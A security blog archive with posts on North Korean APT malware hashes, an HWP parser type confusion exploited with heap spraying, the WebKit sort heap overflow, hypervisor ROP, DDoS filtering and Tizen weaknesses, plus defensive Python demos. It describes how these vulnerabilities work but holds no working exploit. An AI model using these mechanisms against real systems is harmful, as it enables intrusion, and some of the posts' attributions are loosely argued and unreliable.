All posts by admin

Vulnerabilities in the old OLE2-based HWP file format: a vehicle for APT attacks on South Korea

North Korea’s rising ambition seen in bid to breach global banks

My reflection on the CNBC News story (North Korea’s rising ambition seen in bid to breach global banks), with my comments written down below:

Preface:

The overall situation today looks extreme, whether political or commercial. In the commercial world, enterprises try to monopolise markets; between countries there are conflicts of interest over natural resources. My personal feeling is that ownership of undeveloped areas belongs better to nature than to any country, and that is certainly not limited to Antarctica. The description above is not meant to side-track your attention: the terms "benefit" and "interest" change the whole world. Human beings go for survival, and money is the key factor. That is what creates criminal activity and conflicts of interest.

The electronic age has made the overall situation more complex

The electronic age has made the overall situation more complex, especially for the banking industry. The evidence so far is that Mirai DDoS, IoT botnet and zombie-style cyber attacks do not cause banks to lose the money in their drawer. It is the insider-style threats, especially trojans and malware, that let financial institutions lose huge amounts of money (for instance the Bangladesh Bank heist). Furthermore, cyber-espionage infiltration mostly relies on malware and trojans. The best example to quote is the Stuxnet malware, whose goal was to disrupt the operation of the nuclear facilities in Iran.

From a technical point of view, malware is a monitoring (surveillance) and control tool. Large surveillance programs must use malware as their infection medium. It sounds as though the APT (advanced persistent threat) is a descendant of malware.

The term kill chain was originally a military concept describing the structure of an attack. Since then the "cyber kill chain" has been adopted by data security organisations to define the stages of a cyber attack (see the diagram below).

Regarding the definition of APT on Wikipedia: an APT usually targets private organisations, states or both, for business or political motives. APT processes require a high degree of covertness over a long period of time. From a criminal point of view, a hacker will most likely collect credentials, personal details and databases over the long run. For a criminal case like stealing money from an electronic payment system, an APT-type attack is rare.

Does APT equal criminal activity in the commercial world?

Observation: the FBI stated that the Sony intrusion and the banking-environment insider threats (banking malware) are a conspiracy of the North Korean government.

Why do we believe the perpetrator is North Korea?

The official statements from the FBI and US-CERT identified the malware and disclosed its MD5 hashes for reference.

Dropper = d1c27ee7ce18675974edf42d4eea25c6
Wiper = 760c35a80d758f032d02cf4db12d3e55
Web server = e1864a55d5ccb76af4bf7a0ae16279ba
Backdoor = e904bf93403c0fb08b9683a9e858c73e

Since the target of this malware is exactly the Microsoft Windows platform, and on the principle of fair proof, I select and highlight Microsoft's information for reference.

Microsoft Backdoor:Win32/Escad.AA!dha

This threat can give a malicious hacker access to and control of your PC. They can then perform a number of actions, including downloading other malware. As usual, Microsoft does not intend to provide a list of suspicious source IP addresses.

Remark: per Norse Corp's information, the malware was signed with a compromised Sony certificate.

A cyber-defence solution provider found more details about this malware in September 2013. The malware activity appeared to come from the Jilin Province Network and the Liaoning Province Network. The security experts believed the command and control may have come from North Korea, since Jilin and Liaoning provide Internet service to North Korea. This malware is the so-called Kimsuky malware.

Transformation: converting a file type into a weaponised file format

Vulnerabilities in the old OLE2-based HWP file format

What is an HWP file?

HWP documents are document files specialised for the Korean language, in an OLE2-based format similar to Microsoft's Word 97-2003 binary document format. The format was created by the South Korean company Hancom. HWP files are similar to MS Word's DOCX files, except that they are built around the Korean written language, which makes HWP one of the standard document formats used by the South Korean government.

Design weakness of HWP files:

Para text is a data record type that stores the content of each paragraph in the body text. When parsing a para text tag within a .hwpx file, a logic error in hwpapp.dll results in a type confusion. When paired with an appropriate heap spray, this vulnerability can lead to code execution.

Remark: in computer security, heap spraying is a technique used in exploits to facilitate arbitrary code execution. The part of an exploit's source code that implements this technique is called a heap spray. In general, code that sprays the heap attempts to put a certain sequence of bytes at a predetermined location in the memory of a target process by having it allocate (large) blocks on the process's heap and fill those blocks with the right values.
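To make the record structure concrete, here is an added example (mine, not code from the original post or from Hancom) of a bounds-checked walk over the records of an HWP 5.0 body-text section. The header layout and the tag numbers are assumptions taken from the public HWP 5.0 specification as I recall it, and the section bytes at the bottom are constructed for the example:

```python
"""Walk the records of an HWP 5.0 body-text section with bounds checking.

Added example; this is not code from the original post or from Hancom. The
record layout follows the public HWP 5.0 file-format specification as I
recall it and is an assumption here: each record starts with a 32-bit
little-endian header packing TagID (bits 0-9), Level (bits 10-19) and Size
(bits 20-31); a Size field of 0xFFF means the real size follows as the next
4 bytes. The tag numbers HWPTAG_PARA_HEADER = 0x10 + 50 and
HWPTAG_PARA_TEXT = 0x10 + 51 come from the same spec. The sample section at
the bottom is constructed for this example.
"""
import struct

HWPTAG_BEGIN = 0x10
HWPTAG_PARA_HEADER = HWPTAG_BEGIN + 50
HWPTAG_PARA_TEXT = HWPTAG_BEGIN + 51
EXTENDED_SIZE = 0xFFF          # sentinel: real size is in the next 4 bytes


class RecordError(ValueError):
    """Raised when a record header does not fit the data actually present."""


def parse_records(section: bytes):
    """Return a list of (tag_id, level, payload) for every record in `section`.

    A parser that trusts the declared Size and reads past the buffer is the
    kind of logic error that turns a crafted document into memory corruption,
    so every declared size is checked against the bytes that remain.
    """
    records = []
    pos, end = 0, len(section)
    while pos < end:
        if end - pos < 4:
            raise RecordError(f"truncated record header at offset {pos}")
        (header,) = struct.unpack_from("<I", section, pos)
        pos += 4
        tag_id = header & 0x3FF
        level = (header >> 10) & 0x3FF
        size = header >> 20
        if size == EXTENDED_SIZE:
            if end - pos < 4:
                raise RecordError(f"truncated extended size at offset {pos}")
            (size,) = struct.unpack_from("<I", section, pos)
            pos += 4
        if size > end - pos:
            raise RecordError(
                f"record 0x{tag_id:x} at offset {pos} declares {size} bytes "
                f"but only {end - pos} remain")
        records.append((tag_id, level, section[pos:pos + size]))
        pos += size
    return records


def is_well_formed(section: bytes) -> bool:
    """True when every record's declared size fits inside the section."""
    try:
        parse_records(section)
        return True
    except RecordError:
        return False


def make_record(tag_id: int, level: int, payload: bytes) -> bytes:
    """Build a record, using the extended-size form when the payload is large."""
    size = len(payload)
    if size >= EXTENDED_SIZE:
        header = tag_id | (level << 10) | (EXTENDED_SIZE << 20)
        return struct.pack("<II", header, size) + payload
    return struct.pack("<I", tag_id | (level << 10) | (size << 20)) + payload


def para_texts(section: bytes):
    """Decode the text of every PARA_TEXT record (UTF-16LE).

    HWP control characters (code points below 0x20) are dropped; the
    extended control codes that carry extra data words are not handled here.
    """
    texts = []
    for tag_id, _level, payload in parse_records(section):
        if tag_id == HWPTAG_PARA_TEXT:
            decoded = payload.decode("utf-16-le", errors="replace")
            texts.append("".join(ch for ch in decoded if ord(ch) >= 0x20))
    return texts


# Constructed sample: one paragraph header followed by its paragraph text.
SAMPLE_SECTION = (
    make_record(HWPTAG_PARA_HEADER, 0, b"\x00" * 22)
    + make_record(HWPTAG_PARA_TEXT, 1, "안녕하세요 HWP".encode("utf-16-le"))
)

# Constructed malformed sample: the header declares 1023 bytes of paragraph
# text but only six bytes follow the header.
MALFORMED_SECTION = (
    struct.pack("<I", HWPTAG_PARA_TEXT | (1 << 10) | (1023 << 20)) + b"abcdef"
)

if __name__ == "__main__":
    print(para_texts(SAMPLE_SECTION))            # ['안녕하세요 HWP']
    print(is_well_formed(MALFORMED_SECTION))     # False
```

The point is the size check before slicing: a record whose declared size runs past the end of the stream is rejected instead of read. Real documents keep these sections in OLE2 streams (BodyText/Section0) that are usually deflate-compressed, so a full reader has to open the compound file and inflate the stream first; that part is not shown here.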

2013 – Kimsuky malware design objective (OLE2-based HWP file format + APT): targets critical infrastructure and industrial control systems (ICS)

2016 – OnionDog, an APT focused on the energy and transportation industries in Korean-language countries

OnionDog malware is delivered by exploiting a vulnerability in Hangul, the office software popular in Korean-language countries, and it attacked network-isolated targets through a USB worm. The OnionDog APT targets critical infrastructure and industrial control systems (ICS).

Overall comment:

Since North Korea's ruler controls his country as a dictator, developing a nuclear bomb and testing missiles looks like a show of power to the world. From a psychological point of view it is easy to understand his goal in engaging in APT attacks: the dictator would like to emulate his imaginary enemy (the USA) and destroy his enemy's nuclear power facilities. However, I reserve my opinion on whether he is the lord behind the scenes of the banking malware attacks in foreign countries other than South Korea.

Reference to the CSIS report on Korea:

  1. 2011 – Denial-of-service (DDoS) attacks on websites. The first major cyber attack attributed to North Korea was on April 12, 2011; it paralysed the online banking and credit card services of Nonghyup Agricultural Bank for its 30 million customers.
  2. 2013 – Advanced persistent threat campaigns, and the use of less sophisticated but sufficiently effective malware such as the Jokra wiper observed on March 20, 2013. South Korean media report that North Korea has started to target smartphones as well.

For more detail, please refer to the URL below.

What Do We Know About Past North Korean Cyber Attacks and Their Capabilities?

Apple iCloud security burden: WebKit looks like the culprit! (Mar 2017)

Apple's developers work hard on iCloud security. They are making an effort to encourage adoption of two-factor authentication. Apple devices have done a good job on endpoint security so far, which reduces the inherent risk. However, it is hard to avoid vulnerabilities on the application side when the development source code is open, and it is hard to refuse open-source application deployment.

As we know, Apple released security patches on 23 January 2017, and a common theme of the vulnerabilities was one web component: WebKit. Let's start the story from scratch. Be my guest, and let's start the journey!

Why Use WebKit?

Some applications are full-featured browsers, but more often applications embed web content as a convenience, as in a custom document system. WebKit is a layout-engine software component for rendering web pages in web browsers.

When a flaw is found in WebKit, a rogue web page can crash the browser because all code runs in the same process. The new version of WebKit (WebKit2) improves the Safari architecture and aims to avoid this design limitation. It separates the code into two different processes: the user interface and the web page each run in their own process. The details below show how the WebKit2 architecture improves Safari's process isolation.

As time goes by, WebKit has become a major component embedded in web browsers (see below).

However, it raised concern in the cyber-security world in 2012. A heap memory buffer overflow vulnerability exists within WebKit's JavaScriptCore JSArray::sort(...) method.

This design limitation accepts a user-defined JavaScript function and calls it from native code to compare array items. If this compare function reduces the array length, then the trailing array items are written outside the "m_storage->m_vector[]" buffer, which leads to heap memory corruption. At this point you may ask: does the WebKit or WebKit2 design flaw only apply to Apple devices? I believe that it applies to every vendor's products that make use of WebKit or WebKit2.

The exploit was due to a heap buffer overflow in the JavaScriptCore JSArray::sort() method. The program details below will give you an idea in this regard.
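The comparator bug above can be modelled without a browser. The following is an added example, not WebKit's code and not code from the original post: a small insertion sort over a fixed-capacity vector that trusts the array length it read before calling back into the comparator, next to a version that sorts a private copy and re-reads the length before writing back. The array contents and the shrink-to-one comparator are constructed for the demo.

```python
"""Model of the JSArray::sort() comparator bug described above, and a fix.

Added example, not WebKit code and not code from the original post. The
native sort is modelled in plain Python: ArrayStorage stands in for the
m_storage->m_vector[] allocation and raises HeapCorruption on any write
past its current allocation, which is what a real out-of-bounds heap write
would do silently. The comparator that shrinks the array from inside the
callback is the trigger the text describes; the array values are constructed.
"""


class HeapCorruption(RuntimeError):
    """Stands in for a silent out-of-bounds heap write."""


class ArrayStorage:
    """Fixed-capacity vector that reallocates smaller when the JS length shrinks."""

    def __init__(self, values):
        self.vec = list(values)      # the heap allocation (m_vector)
        self.length = len(values)    # the JS-visible length

    def set_length(self, new_length):
        # `arr.length = n` inside the comparator: the engine may reallocate.
        if new_length < self.length:
            self.vec = self.vec[:new_length]
        self.length = new_length

    def get(self, index):
        return self.vec[index] if index < len(self.vec) else None

    def put(self, index, value):
        if index >= len(self.vec):
            raise HeapCorruption(
                f"write of index {index} past allocation of {len(self.vec)}")
        self.vec[index] = value


def vulnerable_sort(storage, compare):
    """Insertion sort that trusts the length read before calling back into JS."""
    n = storage.length                       # captured once, never re-checked
    for i in range(1, n):
        key = storage.get(i)
        j = i - 1
        while j >= 0 and compare(storage.get(j), key) > 0:
            storage.put(j + 1, storage.get(j))   # may land past a shrunk vector
            j -= 1
        storage.put(j + 1, key)
    return storage


def fixed_sort(storage, compare):
    """Sort a private copy the callback cannot shrink, then write back only
    as many elements as the (re-read) length still allows."""
    values = [storage.get(i) for i in range(storage.length)]
    for i in range(1, len(values)):
        key = values[i]
        j = i - 1
        while j >= 0 and compare(values[j], key) > 0:
            values[j + 1] = values[j]
            j -= 1
        values[j + 1] = key
    for i in range(min(len(values), storage.length)):
        storage.put(i, values[i])
    return storage


def make_shrinking_comparator(storage, shrink_to=1):
    """Comparator that sets arr.length = shrink_to on its first call and
    always reports 'greater', forcing the sort to keep shifting elements."""
    state = {"calls": 0}

    def compare(a, b):
        state["calls"] += 1
        if state["calls"] == 1:
            storage.set_length(shrink_to)
        return 1

    return compare


def demo(sort_fn, values=(5, 4, 3, 2)):
    """Run sort_fn against the shrinking comparator; report what happened."""
    storage = ArrayStorage(values)
    try:
        sort_fn(storage, make_shrinking_comparator(storage))
    except HeapCorruption as err:
        return ("corrupted", str(err))
    return ("ok", list(storage.vec))


if __name__ == "__main__":
    print(demo(vulnerable_sort))   # ('corrupted', 'write of index 1 past allocation of 1')
    print(demo(fixed_sort))        # ('ok', [2])
```

Running it, the vulnerable sort attempts a write past the shrunken allocation on the very first shift, which on a real heap is the silent corruption the text describes; the fixed sort finishes and writes back only the one element that still fits. The same pattern applies to any native routine that calls user script and keeps using a length or pointer captured before the call.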

Cyber attack transformation = the attack moves from the local device to the virtual server machine.

Hackers exploiting the WebKit vulnerability hints that a hacker can turn ROP (return-oriented programming) into an attack weapon. A technical article published by IEEE records the following scenario.

Important: an approach to attacking the Xen hypervisor utilising return-oriented programming (ROP). It modifies the data in the hypervisor that controls whether a VM is privileged or not, and thus can escalate the privilege of an unprivileged domain (domU) at run time. As the ROP technique makes use of existing code to implement the attack, without modifying or injecting any code, it can bypass integrity protections based on code measurement. Such an attack is constructed at the virtualisation layer.

The matters above sound horrible! Why? If such hacker techniques develop further, the virtual machines running in a cloud farm will become victims. The same scenario looks possible in iCloud. The side effect is that it does not only compromise a single iCloud container (a single device); it affects the whole iCloud unit. The IEEE article highlighted below is the proof of concept. If you are interested, please do a walk-through of this document highlight. I am afraid the article might be under copyright, and therefore I am not going to copy the whole article. Should you have any interest, please visit the IEEE publisher's web site to find out more.

There is a rumour concerning "rumblings of a massive (40 million) data breach at Apple." Believe it or not? In the meantime, if you are an Apple fan, you must re-confirm all the patches provided by Apple Corp. Keep running, don't stop! For more details, please refer to the URLs below.

Reference:

iCloud for Windows 6.1.1

The latest software updates from Apple

DDoS never expires! A powerful tool as a political and economic weapon (Part 1)

We have heard the DDoS term since the 80s. The foundation of the attack has moved from the network layer (OSI layer 3) to today's application layer (OSI layer 7). Since 2010 the mobile computing trend has led to the BYOD (bring your own device) terminology and carried out more serious distributed denial of service. A public DNS incident last year (2016) exposed the IoT style of distributed denial of service. If you still remember, security experts foresaw that ransomware was going to replace DDoS soon. It looks like that statement was not totally correct. The truth is that the cyber arsenal virtually categorises the weapons into different categories (see below).

Source of attack | Technique (naming convention) | Destination of attack | Benefit to attacker | Side effect
End user computing | DDoS or DoS: SYN flood | Network layer (OSI layer 3) | Prestige and glory | Disruption to satisfy an objective (not limited to economic; may involve political reasons)
End user computing | DDoS or DoS: UDP flood | Network layer (OSI layer 3) | Prestige and glory | Disruption to satisfy an objective (not limited to economic; may involve political reasons)
End user computing | DDoS or DoS: ICMP flood | Network layer (OSI layer 3) | Prestige and glory | Disruption to satisfy an objective (not limited to economic; may involve political reasons)
End user computing | DDoS or DoS focused on web application vulnerabilities | Application layer (OSI layer 7) | Prestige and glory | Disruption to satisfy an objective (not limited to economic; may involve political reasons)
End user computing | DDoS or DoS focused on operating system vulnerabilities | Application layer (OSI layer 7) | Prestige and glory | Disruption to satisfy an objective (not limited to economic; may involve political reasons)
Compromised web site, or email phishing with an attached file or URL embedding malicious code | Application layer (files and OS): attack triggered by ransomware which locks (encrypts) files | 1. Operating system and files; 2. End user computing | Bitcoin (money) | Disruption to satisfy an objective (focused on the business world rather than political reasons)

Information supplement (BYOD and IoT)

Source of attack | Technique (naming convention) | Destination of attack | Benefit to attacker | Side effect
BYOD (mobile phones) | Botnet, the so-called vampire cyber soldier | Both network and application layer (OSI 3 and 7) | Prestige and glory | Disruption to satisfy an objective (not limited to economic; may involve political reasons)
IoT (Internet of things, including webcams, car automation, home appliances, smart TVs and smart electronic devices) | IoT botnet, the so-called descendant of the vampire cyber soldier | Both network and application layer (OSI 3 and 7) | Prestige and glory | Disruption to satisfy an objective (not limited to economic; may involve political reasons)

Yes, this topic might bring interest to readers. OK, let's join together on this journey (DDoS never expires: a powerful political and economic weapon (Part 1)).

Is there a way to identify attacker traffic? Yes, there is, but it seems out of control now! BYOD and IoT technology are the accomplices!

As far as we know, the early-stage DDoS and DoS attacks were keen to use random source addresses to increase the difficulty of defence. The technical term is Random Spoofed Source Address Distributed Denial of Service Attack (RSSA-DDoS).

Let's recall the different types of avoidance mechanism against classic DDoS. There are three types of filter that can prevent classic DDoS at the network layer. For more details, see below:

  1. Ingress filtering
  2. Egress filtering
  3. Router-based filtering

However, the three prevention mechanisms above are not able to stop RSSA-DDoS. Their drawback is that they have difficulty distinguishing legitimate traffic from attack traffic effectively.

Dawn appears only for a short time (FSAD and ECBF)

Filtering based on the source address distribution feature (FSAD)

Solution:

  1. Detect that an attack has occurred and, according to the current attack scale, the historical flow and the required source-address recognition accuracy, set the appropriate legal-address identification parameter.
  2. Identify the legal source addresses and save them to the legal address table (LAT).

But how do we identify the counterfeit source IP addresses?

A solution named the Extended Counting Bloom Filter (ECBF) can do the magic.
Example:
Assume a packet is received whose source address Saddr is (a.b.c.d), for example 1.1.1.1. Then:

• IPH(Saddr) = 256×a + b;
• IPM(Saddr) = 256×b + c;
• IPL(Saddr) = 256×c + d;
• IPLH(Saddr) = 256×d + a.

The ECBF contains four hash codes, each counting the number of packets per source address in its own array. Each array corresponds to one hash function (see below).

It is easy to see that each element of the ECBF corresponds to 2^16 source addresses. For example, the cell A1[256×1+1] = A1[257] corresponds to the source addresses (1.1.x.y), where x and y are any number between 0 and 255. Each time a packet is received, the four cell values corresponding to the packet's source address are incremented by 1: A1[256×a+b], A2[256×b+c], A3[256×c+d] and A4[256×d+a] respectively.
The diagram below gives a high-level understanding.
Legitimate address identifying algorithm under random spoofed source address DDoS attacks (see below):

    Set identifying time interval and threshold T;
    while (1)
        Receive a packet;
        Get source IP address sip;
        Record sip in ECBF;
        if (every element's value for sip in the 4 arrays > T)
            sip is a legitimate address;
        fi;
        if (time interval is over)
            Empty the 4 arrays;
            Start a new time interval;
        fi;
    end while;
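Here is the ECBF identification loop above turned into runnable code, as an added example (mine, not the cited paper's code or the original post's). It uses the four hash codes exactly as defined and runs one identifying interval over a constructed packet stream; the threshold and the traffic mix are assumptions chosen for the demonstration:

```python
"""Extended Counting Bloom Filter (ECBF) legitimate-address identification.

Added example; this is not code from the cited paper or from the original
post. It implements the four hash functions IPH, IPM, IPL and IPLH exactly as
given above (four arrays of 2^16 counters) and one identifying time interval
of the algorithm, then runs it over a constructed packet stream: three
legitimate clients that each send many packets in the interval, plus a flood
of packets whose random spoofed sources each appear once. The threshold T,
the packet counts and the addresses are assumptions chosen for the demo.
"""
import random

CELLS = 256 * 256   # each array covers every value of one 16-bit hash


def ecbf_indices(ip: str):
    """IPH, IPM, IPL, IPLH of a dotted-quad address, in that order."""
    a, b, c, d = (int(octet) for octet in ip.split("."))
    return (256 * a + b, 256 * b + c, 256 * c + d, 256 * d + a)


class ECBF:
    def __init__(self):
        self.arrays = [[0] * CELLS for _ in range(4)]

    def record(self, ip: str):
        for array, index in zip(self.arrays, ecbf_indices(ip)):
            array[index] += 1

    def counts(self, ip: str):
        return [array[index] for array, index in zip(self.arrays, ecbf_indices(ip))]

    def is_legitimate(self, ip: str, threshold: int) -> bool:
        # Legitimate only when every one of its four cells is above T.
        return all(count > threshold for count in self.counts(ip))

    def reset(self):
        # "Empty the 4 arrays; start a new time interval"
        self.arrays = [[0] * CELLS for _ in range(4)]


def identify_legitimate(packet_sources, threshold: int):
    """One identifying time interval: feed each packet's source address to
    the filter and return the legal address table (LAT) plus the filter."""
    ecbf = ECBF()
    lat = set()
    for sip in packet_sources:
        ecbf.record(sip)
        if ecbf.is_legitimate(sip, threshold):
            lat.add(sip)
    return lat, ecbf


def constructed_traffic(seed=7, legit_packets=50, spoofed_packets=20000):
    """Constructed interval: each legitimate client sends legit_packets
    packets; the attack adds spoofed_packets packets with random sources."""
    rng = random.Random(seed)
    legitimate = ["192.0.2.10", "192.0.2.11", "198.51.100.7"]
    sources = [ip for ip in legitimate for _ in range(legit_packets)]
    sources += [".".join(str(rng.randrange(256)) for _ in range(4))
                for _ in range(spoofed_packets)]
    rng.shuffle(sources)
    return sources, set(legitimate)


def run_demo(threshold=20):
    """Return the LAT, the true legitimate set, and the best any spoofed
    source managed on its weakest cell (its margin below the threshold)."""
    sources, legitimate = constructed_traffic()
    lat, ecbf = identify_legitimate(sources, threshold)
    spoofed_best = max(min(ecbf.counts(s)) for s in sources if s not in legitimate)
    return lat, legitimate, spoofed_best


if __name__ == "__main__":
    lat, legitimate, spoofed_best = run_demo()
    print(sorted(lat), sorted(legitimate), spoofed_best)
```

Because each array only has 2^16 cells, a spoofed address can pass only if every one of its four 16-bit slices coincides with a slice of busy legitimate traffic, which the IPLH hash (wrapping d back to a) makes hard. The LAT is then used as the whitelist while the attack lasts, and the arrays are emptied at the end of each interval, as in the pseudocode.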
IoT botnets appear, then trigger DDoS and make the cyber world crazy!
The filter-based defence mechanisms and legitimacy identification method above look insufficient when IoT botnets join the cyber war. Recent headline news stated that the Mirai botnet is turning the internet of things into a botnet of things. See how seriously this attack has affected the cyber world!
The Mirai botnet breaks through advanced defence mechanisms on the basis of sheer volume. It looks like cyber soldiers listening to the instructions of a C&C server to attack the enemy. As a matter of fact, the cyber-incident record of last year proves that the picture above is not an assumption. This is a real story.
References:
Oct 2016 – Dyn cyberattack: the attack involved "tens of millions of IP addresses" (DDoS suspect: Mirai)
2016 – A massive DDoS attack that disabled many online sites during the American presidential election (DDoS suspect: unknown)
2017 – The citizens of Hong Kong are looking for true, fair and free elections; however, the democratic websites frequently encountered DDoS during important events (DDoS suspect: unknown)
The three incidents above tell us that DDoS attacks never expire. It sounds like the attack is under transformation. DDoS attacks began with a focus on the commercial world and have expanded to non-commercial areas. The attack methodology is enhanced by the internet of things and has become powerful. The additional targets now include foreign governments and the democratic world.

Since this discussion is running over time and looks bulky, let's continue in Part 2 next time (DDoS never expires! A powerful tool as a political and economic weapon). Stay tuned.

The next vulnerable operating system! Not Microsoft, not Linux, but Tizen.

Heads up from the Vault 7 CIA scandal topic on WikiLeaks. Last time we talked about a high-level overview of Samsung TV vulnerabilities for home users and the hospitality industry.

http://www.antihackingonline.com/cell-phone-iphone-android-windows-mobile/voyeur-vs-surveillance-immoral-or-civil-governance/

We did not discuss technical information last time, since this is quite an interesting topic. Let's take this opportunity to see whether we can find out more details in this area.

Linux and the Microsoft operating systems have covered the computer market for more than 30 years. Microsoft's server and workstation market share is the biggest in the business enterprise market, excluding the BYOD and IoT markets. Since the Windows OS and traditional Linux OS are bulky, hardware manufacturers would like to develop their own operating systems. Apple hardware, as we all know, uses the proprietary iOS. Android and IoT devices prefer a Linux environment.

Tizen is an open-source mobile operating system developed by an alliance of the Linux Foundation, the LiMo Foundation, Intel, Samsung and Sprint Nextel. It supports the ARM and x86 platforms. The Tizen source code is available for download, as it is an open-source project. From a technical point of view, Tizen looks likely to replace the OS platform for the BYOD and IoT device markets soon. Meanwhile, the Tizen operating system has its own fundamental design limitations and weaknesses. Hackers or government enforcement teams can rely on these alleged design limitations and weaknesses to compromise the device.

As a matter of fact, jailbreak activities have been popular since the Apple iPhone era. We can see that a number of jailbreak techniques are available on the market, including for Nintendo, Sony and Microsoft game consoles and for mobile phones. But who is the accomplice in these activities? We believe it is open source!

About the situation of jailbreaking smart TVs on the market

Understanding the Tizen OS architecture

Tizen is an operating system based on the Linux kernel and the GNU C Library, implementing the Linux API. New models of Samsung smart TV run on top of the Tizen OS platform. The Tizen OS architecture is shown below:

About the jailbreak methodology and the officially defined usage angle

As usual, the traditional jailbreak method relies on a physical USB serial adapter cable. A security expert did a proof of concept on an LG smart TV. The experiment proved that it is easy to hack your LG TV with an Arduino board by uploading scripts. Mike Stevans, the professor of an ethical hacking course in Mexico, explains that libLGTV_serial is a Python library to control LG TVs (or monitors with serial ports) via their serial (RS232) port. Therefore you can use this method to hack into TV mode and root it. Under the hardware manufacturer's policy, end users are allowed to customise the firmware. LG smart TV users can download old firmware from official LG websites or from Internet forums, and these firmware images are customised to user needs. Since the manufacturer defines an open-standard policy for its products, the policy benefits product development: more input, ideas and solutions can improve and enhance the smart TV's functions and features. However, a group of people, not limited to hackers, can take advantage of this to satisfy their own wants, for instance surveillance and information collection (video and voice recording). But it is hard to judge such an action as incorrect if it is used to prevent crime or terrorism.

Wireless attack on a smart TV?

Hackers found that you are able to compromise a Samsung TV through the Skype application! One approach is to install the Skype widget on the smart TV with the goal of reproducing a plugin authentication bypass. An authentication bypass was discovered in the Desktop API offered by Skype, whereby a local program could bypass authentication if it identified itself as a Skype Dashboard widget program. The smart TV app (Skype) is linked directly to Tizen libraries, native libraries or libraries supplied by the Application Compatibility Layer (ACL), depending on functional, performance or hardware requirements. The architecture model of the Skype application is shown below:

The information above indicates that the fundamental design of the Tizen operating system contains an authentication weakness. A hacker can easily embed malicious code in a zip file delivered through Skype. This can be used to copy files to any writable file system on the target and install a backdoor.

Remark: yes, agreed that the culprit is not only Tizen OS itself; the Skype application contains vulnerabilities. The T9000 backdoor discovered by Palo Alto Networks is able to infect victims' machines to steal files, take screengrabs and record Skype conversations.

Reference: CVE-2012-1856 and CVE-2015-1641

Foreseeable security issues in Tizen OS

1. Application over-permission

Web application interfaces (APIs) leverage device functions by making use of the JavaScript bridge [addJavascriptInterface]. The program developer should describe the permissions in the manifest file (the manifest file describes the name, version, access rights and referenced library files of the application). However, the device APIs inside Tizen are already defined, which raises a concern about the attack surface of over-privileged apps.

2. OS memory protection

DEP (Data Execution Prevention) is not enabled on Tizen OS.

The Address Space Layout Randomization (ASLR) function has bugs. Remark: a technical article found that the addresses of the heap, stack and main modules in Tizen OS were not randomised. As a result, it cannot avoid malware infection through memory-corruption exploits.
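The claim that heap, stack and main module do not move between runs is easy to verify on any Linux-based image, Tizen included, by comparing two process maps. Below is an added example (mine, not from Tizen or the cited article) that parses /proc/<pid>/maps listings from two launches and lists the regions whose base address repeated; the two listings embedded in it are constructed sample data so it runs offline:

```python
"""Check whether the stack, heap and main module really move between runs.

Added example; not code from Tizen or from the article the post cites. It
reads Linux /proc/<pid>/maps listings from two launches of the same program
and reports the regions whose base address did not change. The listings
embedded below are constructed sample data (one pair with no randomisation,
one pair with it) so the check runs offline; collect_maps() shows how to
gather a real listing on a Linux host.
"""
import re
import subprocess

MAPS_LINE = re.compile(
    r"^([0-9a-f]+)-([0-9a-f]+)\s+(\S{4})\s+\S+\s+\S+\s+\d+\s*(.*)$")


def parse_maps(text: str):
    """Return {region: base_address} for the regions ASLR is expected to move:
    the main module (first file-backed mapping), libc, [heap] and [stack]."""
    bases = {}
    for line in text.splitlines():
        match = MAPS_LINE.match(line.strip())
        if not match:
            continue
        start, path = int(match.group(1), 16), match.group(4)
        if path in ("[heap]", "[stack]"):
            name = path
        elif "libc" in path:
            name = "libc"
        elif path.startswith("/"):
            name = "main"
        else:
            continue
        bases.setdefault(name, start)     # keep the first (lowest) mapping
    return bases


def unrandomised_regions(maps_a: str, maps_b: str):
    """Names of regions mapped at the same base address in both runs."""
    a, b = parse_maps(maps_a), parse_maps(maps_b)
    return sorted(name for name in a if name in b and a[name] == b[name])


def collect_maps() -> str:
    """Launch a process and capture its own /proc/self/maps (Linux only)."""
    return subprocess.run(["cat", "/proc/self/maps"],
                          capture_output=True, text=True, check=True).stdout


# Constructed sample: two runs of a non-PIE binary on a system where heap and
# stack randomisation is switched off. Every base repeats run to run.
RUN_A_NO_ASLR = """\
00400000-00452000 r-xp 00000000 08:02 173521 /usr/bin/app
00651000-00652000 rw-p 00051000 08:02 173521 /usr/bin/app
00652000-00673000 rw-p 00000000 00:00 0 [heap]
7ffff7a0d000-7ffff7bd0000 r-xp 00000000 08:02 3675 /lib/x86_64-linux-gnu/libc-2.19.so
7ffffffde000-7ffffffff000 rw-p 00000000 00:00 0 [stack]
"""
RUN_B_NO_ASLR = RUN_A_NO_ASLR

# Constructed sample: the same non-PIE binary with ASLR on. Only the
# executable itself (fixed at 0x400000 because it is not PIE) stays put.
RUN_B_ASLR = """\
00400000-00452000 r-xp 00000000 08:02 173521 /usr/bin/app
00651000-00652000 rw-p 00051000 08:02 173521 /usr/bin/app
01a3c000-01a5d000 rw-p 00000000 00:00 0 [heap]
7f3c1e2b4000-7f3c1e477000 r-xp 00000000 08:02 3675 /lib/x86_64-linux-gnu/libc-2.19.so
7ffd5a6e9000-7ffd5a70a000 rw-p 00000000 00:00 0 [stack]
"""

if __name__ == "__main__":
    print(unrandomised_regions(RUN_A_NO_ASLR, RUN_B_NO_ASLR))  # ['[heap]', '[stack]', 'libc', 'main']
    print(unrandomised_regions(RUN_A_NO_ASLR, RUN_B_ASLR))     # ['main']
```

Run collect_maps() twice on the device (or `cat /proc/self/maps` from a shell) and feed both listings to unrandomised_regions(). A non-PIE executable will always show up as fixed, which is expected; the heap, the stack and libc showing up as fixed is the condition the article describes, and it is also what makes the missing DEP so damaging, because an attacker can hard-code the addresses.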

Conclusion:

As mentioned last time, the first thing I will do after checking in to a hotel is this action.

Voyeur vs surveillance: immoral or civil governance

Nowadays CCTV, webcams and even your mobile phone camera are involved in our daily life. It seems that surveillance behaviour follows us from the moment we are born. These are my reflections on the CIA scandal. What is the exact scandal?

Immoral or civil governance

As said, surveillance behaviour follows us from the moment we are born; for instance, a mum looks after her child, taking care of homework and daily life. Such behaviour looks normal, and nobody would call it governance. From a technical point of view the actions are similar, but for sure this is moral.

How do we identify an immoral action? For instance, becoming a voyeur. Outside a criminal investigation, sniffing, recording and voyeurism are immoral behaviour.

The WikiLeaks documents under the subject Vault 7: CIA Hacking Tools Revealed brought information to my attention, especially the CIA malware targeting smart TVs. Jailbreak techniques for the iPhone, Android and games consoles are common; heads up that even for smart TVs, jailbreaking the Samsung TV is a hot topic.

